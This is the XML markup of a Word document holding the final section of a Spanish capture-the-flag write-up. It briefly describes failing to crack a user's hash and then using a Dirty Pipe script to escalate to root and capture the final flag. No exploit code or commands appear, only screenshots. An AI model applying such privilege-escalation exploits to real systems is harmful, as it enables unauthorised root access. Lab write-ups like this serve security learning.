    <w:p w14:paraId="6DEFB939" w14:textId="01B4485A" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ahí nos indica que veamos la imagen que previamente ya analizamos y mediante la cual llegamos al hash del usuario Cypher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476FDD77" w14:textId="34C40A58" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>En vista y considerando que no podemos ingresar con el usuario Cypher porque no logramos descifrar el hash</w:t>
      </w:r>
      <w:r w:rsidR="00B05FB6">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> es que se decide intentar con un script de una vulnerabilidad de escala de privilegios encontrada el año 2022. En específico se utiliza el Dirty Pipe mediante la cual se logra una escalada de privilegios hacia el usuario root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E113250" w14:textId="6E64EB77" w:rsidR="00B05FB6" w:rsidRDefault="00B05FB6" w:rsidP="00B05FB6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AA31A9" wp14:editId="0DD71CD1">
            <wp:extent cx="4047619" cy="149523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rty-pipe.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4047619" cy="1495238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="609CFD74" w14:textId="4D5614E1" w:rsidR="006F0EE6" w:rsidRDefault="00B05FB6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Y ya con esto y un análisis de directorio es que llegamos a la flag final donde se nos indica que lo hemos logrado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C898F" w14:textId="184065AB" w:rsidR="00B05FB6" w:rsidRPr="00D06FAE" w:rsidRDefault="00B05FB6" w:rsidP="00B05FB6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79892184" wp14:editId="309DC8DC">
            <wp:extent cx="3190476" cy="1390476"/>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ag final.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3190476" cy="1390476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00B05FB6" w:rsidRPr="00D06FA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E2DD7A" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6ABCEC53" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="00385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CF585C" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F27E8A1" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857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C3E0786"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6372675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3507"/>
    <w:rsid w:val="0010147C"/>
    <w:rsid w:val="00265C77"/>
    <w:rsid w:val="003857F7"/>
    <w:rsid w:val="003F46EB"/>
    <w:rsid w:val="004554FE"/>
    <w:rsid w:val="004607D3"/>
    <w:rsid w:val="0050458D"/>
    <w:rsid w:val="00515FFD"/>
    <w:rsid w:val="006F0EE6"/>
    <w:rsid w:val="007B3507"/>
    <w:rsid w:val="007B3F2C"/>
    <w:rsid w:val="00B05FB6"/>
    <w:rsid w:val="00B20858"/>
    <w:rsid w:val="00CA7DAC"/>
    <w:rsid w:val="00D06FAE"/>
    <w:rsid w:val="00D8169C"/>
    <w:rsid w:val="00D86F3A"/>
    <w:rsid w:val="00E97845"/>
    <w:rsid w:val="00F00DA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C466E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{996578DD-4D00-4307-AD0B-1B4B4F7A1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sutil">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="007B3507"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007B3507"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003857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857F7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003857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857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19AF15-7D59-4A94-B4FA-ADC6D8BD5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6</Pages>
  <Words>572</Words>
  <Characters>3146</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Valdivia</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Valdivia Becerra, Paulo Matias</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-07T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-21T21:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>